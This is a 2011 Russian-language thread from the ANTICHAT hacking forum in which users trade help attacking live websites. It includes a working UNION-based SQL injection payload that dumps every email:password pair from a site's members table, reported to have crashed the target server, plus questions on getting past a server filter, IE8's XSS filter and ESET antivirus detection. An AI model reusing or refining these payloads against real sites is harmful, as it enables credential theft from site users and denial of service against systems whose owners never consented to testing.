ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

08.08.2011, 15:36
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
0
|
|
хмм как нету? после второго значения лимита можно свой запрос добавить не?
|
|
|
|

08.08.2011, 15:41
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме: 5386281
Репутация:
1177
|
|
Сообщение от nikon2k
nikon2k said:
хмм как нету? после второго значения лимита можно свой запрос добавить не?
Можно, но он фильтруется. К примеру ф-цией intval().
|
|
|

08.08.2011, 15:43
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
0
|
|
а с char() тоже не получится?
|
|
|
|

08.08.2011, 15:45
|
|
Guest
Сообщений: n/a
Провел на форуме: 195266
Репутация:
53
|
|
Сообщение от nikon2k
nikon2k said:
хмм как нету? после второго значения лимита можно свой запрос добавить не?
можно всё что хочешь туда добавить, но как сказали выше - там стоит фильтр. Что-то типа /\d+/ или же (int)$_GET['some_param']. А ранее проверяется на вхождение в строку кавычки.
upd.
Сообщение от None
а с char() тоже не получится?
ты к нормальной("существующей") странице добавь какие-нить буквы/символы. Если отображается всё тоже самое, то там стоит фильтр.
|
|
|
|

08.08.2011, 15:45
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме: 5386281
Репутация:
1177
|
|
Сообщение от nikon2k
nikon2k said:
а с char() тоже не получится?
Фильтр пропускает только числа.
http://gigwarez.ru/page/12,34,45/ => 12
http://gigwarez.ru/page/12blabla/ => 12
|
|
|

08.08.2011, 21:19
|
|
Новичок
Регистрация: 05.03.2007
Сообщений: 3
Провел на форуме: 66211
Репутация:
35
|
|
Код:
Code:
http://site.ru/?a=10\"
1)как обойти в данном случае фильтр на сервере? Пробел не проходит (точнее не фильтр, а какая то странная ошибка c обрубанием ссылки после пробела и вывода текста: [Bad Request
Your browser sent a request that this server could not understand.
The request line contained invalid characters following the protocol string.]
Вариант замены пробела на "/" или "/**/" не проходит в chrome, что обидно Во всех остальных браузерах срабатывает.
2) как обойти xss фильтр в IE8 в данном случае?
3) как обойти в данном случае антивирус ESET Nod 32? На домены вида *.co.cc он ругается
Подскажите варианты
P.S. Также нельзя использовать ";", возможно ещё что-то.
|
|
|

09.08.2011, 00:44
|
|
Guest
Сообщений: n/a
Провел на форуме: 129743
Репутация:
92
|
|
Ситуация следующая, на ресурсе присутствует sql-иньекция.
Подскажите как вывести всю нужную информацию, а не только часть?
Пример запроса:
test.ru/test.php?id=-40+union+select+1,group_concat(0x3a,mail,pwd),3,4, 5,6,7,8,9+from+members--
|
|
|
|

09.08.2011, 00:48
|
|
Guest
Сообщений: n/a
Провел на форуме: 262707
Репутация:
935
|
|
Сообщение от mix0x0
mix0x0 said:
Ситуация следующая, на ресурсе присутствует sql-иньекция.
Подскажите как вывести
всю
нужную информацию, а не только часть?
Пример запроса
:
test.ru/test.php?id=-40+union+select+1,group_concat(0x3a,mail,pwd),3,4, 5,6,7,8,9+from+members--
Код:
Code:
test.ru/test.php?id=-40+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(members)where(0x00)in(@x:=concat(@x,0x3c62723e,mail,0x3a,pwd))))x),3,4,5,6,7,8,9--+
|
|
|
|

09.08.2011, 01:06
|
|
Guest
Сообщений: n/a
Провел на форуме: 129743
Репутация:
92
|
|
Сообщение от Expl0ited
Expl0ited said:
Код:
Code:
test.ru/test.php?id=-40+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(members)where(0x00)in(@x:=concat(@x,0x3c62723e,mail,0x3a,pwd))))x),3,4,5,6,7,8,9--+
спасибо, вот только серв упал
Возможно ли вывести данные по частям? Чтобы не сильно нагружать сервер.
Пробовал использовать limit, но безрезультатно
|
|
|
|

09.08.2011, 01:10
|
|
Guest
Сообщений: n/a
Провел на форуме: 262707
Репутация:
935
|
|
Сообщение от mix0x0
mix0x0 said:
спасибо, вот только серв упал
Возможно ли вывести данные по частям? Чтобы не сильно нагружать сервер.
Пробовал использовать limit, но безрезультатно
Получаемый массив данных не должен превышать одного мегабайта, иначе тянуть только стандартными методами.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|